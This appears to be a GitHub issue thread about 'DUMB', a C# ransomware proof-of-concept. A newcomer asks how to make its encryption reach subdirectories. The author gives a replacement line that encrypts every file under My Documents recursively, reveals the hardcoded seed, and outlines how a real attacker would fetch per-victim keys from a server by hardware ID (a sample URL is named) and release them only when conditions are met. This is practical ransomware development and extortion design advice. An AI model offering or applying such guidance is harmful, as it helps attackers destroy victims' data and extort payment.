### ISSUE TITLE
DUMB Question

### ISSUE THREAD

**Issue by Macleodsolutions** [AlphaDelta/Secure-Desktop#8]
Sorry for posting here but it appears you have the issue tracker turned off on DUMB. Awesome PoC teaching me a ton about actual program flow (first 2 months of c# programming here). I noticed that the cryptwindow targets only files in the designated folder and I was wondering how you would go about changing that to cascade down any sub directories recursively in a more traditional locker style. Spent a good deal of time to avoid having to ask a dumb DUMB question but here I am. Many thanks in advance.

**Comment by AlphaDelta** [comment]
The line that controls what files are crypted is [line 31 of CryptWindow.cs](https://github.com/AlphaDelta/DUMB/blob/master/DUMB/CryptWindow.cs#L31).

If you were to change that to `files = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments), "*", SearchOption.AllDirectories);` every file inside 'My Documents' and its subfolders would be crypted.

**Comment by Macleodsolutions** [comment]
Thanks for the reply! I tried this on an untouched master on DUMB and at appears to be crashing before launching the main form. Any further help on this would be much appreciated.

**Comment by AlphaDelta** [comment]
It seems to be working for me, are you able to get the exception from the 'Output' log in Visual Studio?

**Comment by Macleodsolutions** [comment]
Ya we're getting into some user permission issues I believe which isnt really in the scope on my tinkering, but SearchOption.TopDirectoryOnly works fine.

**Comment by Macleodsolutions** [comment]
Just playing around with a decrypter for if the system is reset just wondering how you would produce the plaintext/hex password from the rsl generation process?

**Comment by AlphaDelta** [comment]
Sorry for the late reply, I've been a bit incapacitated these last few days (good old Christmas drinking).

The rsl seed is passed to `Crypt.CryptFile` as the parameter 'subkey', which I call from [line 46 of CryptWindow](https://github.com/AlphaDelta/DUMB/blob/master/DUMB/CryptWindow.cs#L46) which always uses the same seed (`0x54, 0x45, 0x53, 0x54, 0x4B, 0x45, 0x59`, ASCII for `TESTKEY`) regardless of whom runs it (since it's a PoC), if it were to be used for malicious purposes the key would probably be generated and kept by a server in the attackers possession. For example DUMB could be set up to fetch `http://ransomwarepoc.com/genseed.php?hwid=[victim's HWID]` (HWID stands for HardWare ID) to generate and return the seed that will be passed to `Crypt.CryptFile` (or in the event a key has already been generated for that HWID, produce nothing), and then when decryption is needed, fetch `http://ransomwarepoc.com/check.php?hwid=[victim's HWID]` which would check the victim has met whatever conditions on the server and then produce a key if it succeeds (or again, produce nothing if the conditions have not been met).

If the victim forces the computer to power down by either causing a hardware power down (usually by holding the power button for five seconds) or cutting power to the machine (such as pulling the plug out of a tower or removing the battery from a laptop) during the encryption process there's nothing you can really do to stop or mitigate that.
